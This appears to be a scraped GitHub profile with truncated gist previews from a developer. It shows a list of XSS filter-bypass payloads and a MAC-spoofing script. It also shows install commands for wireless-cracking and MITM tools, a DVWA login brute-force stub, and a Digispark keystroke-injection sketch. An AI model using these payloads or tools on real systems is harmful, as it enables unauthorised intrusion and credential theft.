Here are some info about me
- 🔭 I’m currently working as Senior Python Developer
- 📫 How to reach me: [email protected]
- 🌍 Currently working at fully remote job
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(2);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(3);</script> | |
<script\x09type="text/javascript">javascript:alert(4);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(5);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(6);</script> | |
<script\x0Atype="text/javascript">javascript:alert(7);</script> | |
'`"><\x3Cscript>javascript:alert(8)</script> | |
'`"><\x00script>javascript:alert(9)</script> | |
<img src=1 href=1 onerror="javascript:alert(10)"></img> |
""" | |
KIMERA | |
""" | |
import ast | |
import random | |
import requests | |
from stem import Signal | |
from bs4 import BeautifulSoup |
#!/bin/bash | |
sudo -s | |
service network-manager stop && service networking stop | |
for i in $(netstat -i | awk '{if (NR!=1 && NR!=2) print $1}'; do | |
ifconfig $i down; | |
macchanger -a $i; | |
dhclient -v -r $i |
sudo apt-get -y install libpcap-dev libssl-dev aircrack-ng | |
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip | |
cd bully*/ | |
cd src/ | |
make | |
sudo make install | |
apt install aircrack-ng xterm tmux procps xterm tmux ettercap-text-only sslstrip isc-dhcp-server dsniff reaver bully pixiewps pixiewps asleap openssl ccze x11-utils rfkill asleap screen asleap hostapd beef beef hashcat mdk4 beef hashcat bettercap john john hostpad-wpe hostapd-wpe chucnh crunch git build-essential libssl-dev libpcap-dev libpcap-dev libssl-dev aircrack-ng |
# source: https://dev.to/mariamxl | |
# https://dev.to/mariamxl/dijkstras-algorithm-in-python-algorithms-for-beginners-dkc | |
from collections import deque, namedtuple | |
inf = float('inf') | |
Edge = namedtuple('Edge', 'start, end, cost') | |
def make_edge(start, end, cost=1): | |
return Edge(start, end, cost) |
from bs4 import BeautifulSoup | |
import requests | |
INCORRECT_MESSAGE = 'Username and/or password incorrect' | |
cookies = { | |
'PHPSESSID': 'nrhha74heg9un626m5hubq5a05', | |
'security': 'low', | |
} |
#include "DigiKeyboard.h" | |
void setup() { | |
} | |
void loop() { | |
int d=2500; | |
DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); | |
DigiKeyboard.delay(d); | |
DigiKeyboard.sendKeyStroke(0,MOD_GUI_LEFT); |
Here are some info about me
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
import requests | |
import json | |
import concurrent.futures | |
cookies = { | |
'io': 'HtsVc9fnegA8bP5jAAOe', | |
} |
import requests | |
from bs4 import BeautifulSoup | |
import json | |
cookies = { | |
'cpsession': 'XXXXX', | |
} | |
headers = { | |
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', |